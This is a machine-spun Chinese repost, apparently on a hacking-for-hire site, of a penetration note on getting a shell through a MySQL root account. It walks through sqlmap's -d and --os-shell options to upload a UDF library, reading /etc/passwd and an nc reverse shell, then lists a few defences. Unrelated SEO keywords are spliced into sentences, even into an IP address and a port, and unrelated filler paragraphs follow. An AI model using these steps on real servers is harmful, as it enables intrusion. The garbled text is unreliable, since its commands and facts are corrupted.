首页 黑客接单正文

拉斯维加斯黑客大会2016冠军-手机qq号被黑客盗了怎么办-渗透学习笔记--通过mysql的root账号来get shell

hacker 黑客接单 2020-10-28 236 2

手机qq号被黑客盗了该怎么办-渗透学习笔记--根据mysql的root账号来get shell

  今日的情景是前一周以内网渗透的情况下遇到过的,寻找一个mysql数据库查询弱口令。

     账号和登陆密码分别是root,也就是mysql中的dba。

     这儿实际上管理权限拉斯维加黑客交流会2016总冠军非常大了,更先mysql的root客户具备文档写管理权限,另外mysql5.0之上,出示一个system涵数,而这一涵数一般被 *** 攻击作为shell的插口。

     那时候在碰到这一弱口令时,我也在想怎样快速的拿到这台服务器,根据mysql的root账号。是不是有较为迅速的方式,此刻,我自然想起了sqlmap。历经查看github上的文本文档,我发现那样的主要参数。

     下边,让我们一起来学习培训一下这一情景吧!



自然环境:

     两部设备,一台是kali linux,做为mysql *** 服务器,对外开放ssh服务及其mysql服务项目,ip详细地址为192.168.80.128。


                     此外一台是ubuntu,做为进攻服务器,安裝有nmap、sqlmap,ip详细地址为192.168.80.129。



1、更先大家对nmap扫描仪一下普遍端口号,

指令以下:nmap -A -n -T3 192.168.80.128

扫描结果如下图:




2、第二步主要是根据工程爆破专用工具发觉了mysql的弱口令,这一步忽视了。

3、如今而言具体内容,大家得到 mysql的root账号和登陆密码以后如何运用

1)大家先看来一下github上的sqlmap文档(ClickMe)




     我们可以见到这是一个"-d"选择项,使用 *** 在For example有

  拉斯维加黑客交流会2016总冠军    整一个的英语的语法为:" DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME"或是是" DBMS://DATABASE_FILEPATH"。

     [1]DBMS:意味着所应用的数据库查询,如大家这儿是mysql

  拉斯维加黑客交流会2016总冠军    [2]USER:相匹配大家数据库查询的客户,如大家这儿是root

     [3]PASSWORD:相匹配大家数据信息的登陆密码,如我的 *** 服务器为3erver

     [4]DBMA_IP:数据库查询 *** 服务器相匹配的ip详细地址,如我这里为192.168.80.128

拉斯维加黑客交流会2016总冠军     [5]DBMS_PORT:数据信息 *** 服务器所应用的端口号,不可以省去。默认设置大家写3306

     [6]DATABASE_NAME:你需要应用的数据库查询名,由于mysql一般会出现test数据库查询,如我这里应用test。倘若沒有test,我们可以自身应用create database test;建立一个

2)拉斯维加黑客交流会2016总冠军下边大家刚开始运用, *** 服务器来更先以root真实身份运作mysql数据库查询。看一下会产生什么事情。在Mysql中,以哪些真实身份运作数据库查询,会在/etc/mysql/my.cnf这一环境变量设定。因此 下边我将客户mysqld连接点中的user改动为root。如下图:




大家根据查看进程,能够见到在服务项目起动的情况下,mysqld早已携带--user=root这一选择项了。  



3)如今我刚开始依据sqlmap的选择项在kali里边对mysql服务器虚拟机联接。

sqlmap -d "mysql://root:3erver@192.168.80.128:3306/test" -f




上边-f主要参数是复印mysql *** 服务器的版本信息。如下图



大家以后将-f主要参数拆换成--os-shell主要参数



以后sqlmap会使我们挑选服务器的十位数,如果你永远不知道就猜一个,总之2个选择项,并不是32位系统便是64位。



我这里挑选64位,随后系统软件便会替大家提交相匹配十位数的动态链接库文档,这一文档出示system涵数便于我们可以实行DOS命令。如图所示,



在我们键入whoami指令情况下,系统软件会了解大家是不是回到指令的輸出。大家这儿挑选"a",意味着一直回到指令的輸出。能够见到这儿能够获得到管理权限与大家运作mysql *** 服务器用户权限一致。换句话说大家这儿获得root管理权限全部,例如查询/etc/passwd,nc反跳shell、加上客户等。

ifconfig信息内容:



查询/etc/passwd文档,



nc反跳shell

(1)实行nc,在Mysql *** 服务器上23拉斯维加黑客交流会2016总冠军33端口号开展监视。




(2)大家查询大家战机的ip,能够见到确实是192.168.80.129。

大家应用ncat 19拉斯维加黑客交流会2016总冠军2.168.80.128 2333 来开展联接反跳shell。




(4)到拉斯维加黑客交流会2016总冠军这儿,大家早已将怎样快速运用一个mysql的root账号来获得系统软件管理权限的全过程演试结束。

4、局限是啥?

(1)大家这儿提及过,运作mysql的客户必须是root账号。由于这儿全部运用步骤是那样的

[1]sqlmap根据root的账号和登陆密码联接上远程控制的数据库查询

[2]sqlmap将udf文件夹名称下相匹配系统软件服务平台的64位或是32位系统的动态性拉斯维加黑客交流会2016总冠军链接库上传文件到远程控制数据库查询的

/usr/lib/mysql/plugin/文件目录下

[3]sqlmap使用过早已提交的动态链接库文档来启用system涵数来实行客户键入的指令。

(2)在上面提及,我们要将动态链接库传入/usr/lib/mysql/plugin/文件目录下,可是这一文件目录仅有root账号具备写管理权限。换句话说,如果运作mysqld的客户并不是root,那拉斯维加黑客交流会2016总冠军么大家便没法根据这类方式来实行DOS命令。

(3)一般windows上的mysql root账号能实行DOS命令的比较多,由于必须专业创建一个非访问权限的客户去运作mysql,因此 有一部分网站管理员将mysql运作在访问权限的账号上,这个时候大家将获得到它的管理权限。



5、防御力对策

(1)linux的最少拉斯维加黑客交流会2016总冠军管理权限标准,不必给mysql数据信息的plugin文件夹名称授予写管理权限,即便 授予了还要限定好有着管理权限的客户。我们可以登陆数据库查询以后,应用

select @@plugin_dir;

来查询plugin的文件目录,如下图,是我还在windows上获得到的plugin_dir




(2)更好是只让root在localhost上运作,而可以远程登录的数据库查询客户只分派增删等管理权限,不必分派FILE管理权限。



6、这一篇文章是依据情景方式来写的,随后详细介绍专用工具及其运用方式。

。应用智能化手机扫描仪“学信二维码”,以移动互联 *** 认证学籍档案/文凭汇报,完成挪动认证、及时认证。学员自己根据学信档案申请办理学籍档案线上认证汇报(汉语。手机qq号被黑客盗了该怎么办

深蓝色个人工作室黑客你好,监控摄像头在一切正常打开的情况下,监控摄像头显示灯全是会亮的;一般状况下,在您安裝了电脑杀毒软件以后,而且按时对电脑上开展查杀木马,病毒是难以侵入您的电脑上的。

手机qq号被黑客盗了该怎么办非常简单盗号软件,实际上中小学生都是会因此 会个盗号软件不可以拉斯维加黑客交流会2016总冠军算作黑客,黑客都不干这一,必须的情况下她们总是去社会工作者。

kiko的高科技里有些是概念机,有一个是确实能够完成的。 kiko的奇妙高科技中,有笔记本电脑搭配的手机蓝牙迷你投影仪,便携电脑二件套。 迷你投影仪挺贵的,但是越。

辐射源分成电磁波辐射(哪些x光的。)和非电离辐射(光,电,声辐射源)。因此 一个蹭网器传出x光,不太可能。手机qq号被黑客盗了该怎么办

最常见的专用工具自然是电脑上,自然也有下边的手机软件,但是了解有什么作用呢拉斯维加黑客交流会2016总冠军,可能学不懂。ANGRYIPSCANNER黑客能够根据该专用工具应用大家的IP地址来对其开展追踪并。

手机qq号被黑客盗了该怎么办ViLearn网址非常好,里边的视頻全是完全免费的,较为技术专业。黑客网址:网站链接这自然是最基础的黑客技术性。假如你要不容易一切编程语言,我建议你从Python刚开始。它设计方案清楚,文本文档齐备,对新手很适合。虽然是一门非常好的初中级語言,它不。

标签:

版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。